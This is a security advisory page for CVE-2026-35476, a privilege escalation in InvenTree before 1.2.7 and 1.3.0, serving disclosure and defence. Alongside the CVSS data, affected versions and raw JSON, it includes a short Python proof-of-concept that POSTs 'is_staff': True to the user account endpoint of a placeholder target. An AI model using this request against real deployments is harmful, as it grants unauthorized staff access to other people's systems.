Security Vulnerability Report
中文
CVE-2026-35476 CVSS 7.2 HIGH

CVE-2026-35476

Published: 2026-04-08 20:16:24
Last Modified: 2026-04-21 13:34:40
Source: [email protected]

Description

InvenTree is an Open Source Inventory Management System. Prior to 1.2.7 and 1.3.0, a non-staff authenticated user can elevate their account to a staff level via a POST request against their user account endpoint. The write permissions on the API endpoint are improperly configured, allowing any user to change their staff status. This vulnerability is fixed in 1.2.7 and 1.3.0.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:inventree_project:inventree:*:*:*:*:*:*:*:* - VULNERABLE
InvenTree < 1.2.7
InvenTree < 1.3.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target URL (may vary based on deployment) target_url = "http://target-domain.com/api/user/account/" # Attacker's credentials or session token headers = { "Authorization": "Token <YOUR_AUTH_TOKEN>", "Content-Type": "application/json" } # Payload to exploit the permission misconfiguration payload = { "is_staff": True } try: # Send POST request to elevate privileges response = requests.post(target_url, json=payload, headers=headers) if response.status_code == 200: print("[+] Privilege escalation successful! User is now staff.") else: print(f"[-] Failed. Status code: {response.status_code}") print(response.text) except Exception as e: print(f"[!] Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-35476", "sourceIdentifier": "[email protected]", "published": "2026-04-08T20:16:24.323", "lastModified": "2026-04-21T13:34:40.377", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "InvenTree is an Open Source Inventory Management System. Prior to 1.2.7 and 1.3.0, a non-staff authenticated user can elevate their account to a staff level via a POST request against their user account endpoint. The write permissions on the API endpoint are improperly configured, allowing any user to change their staff status. This vulnerability is fixed in 1.2.7 and 1.3.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-285"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:inventree_project:inventree:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.2.6", "matchCriteriaId": "E37FC80D-0C3A-425E-A35A-A8EA3B0B4F15"}]}]}], "references": [{"url": "https://docs.inventree.org/en/stable/concepts/threat_model/#assumed-trust", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/inventree/InvenTree/security/advisories/GHSA-r8q5-3595-3jh2", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.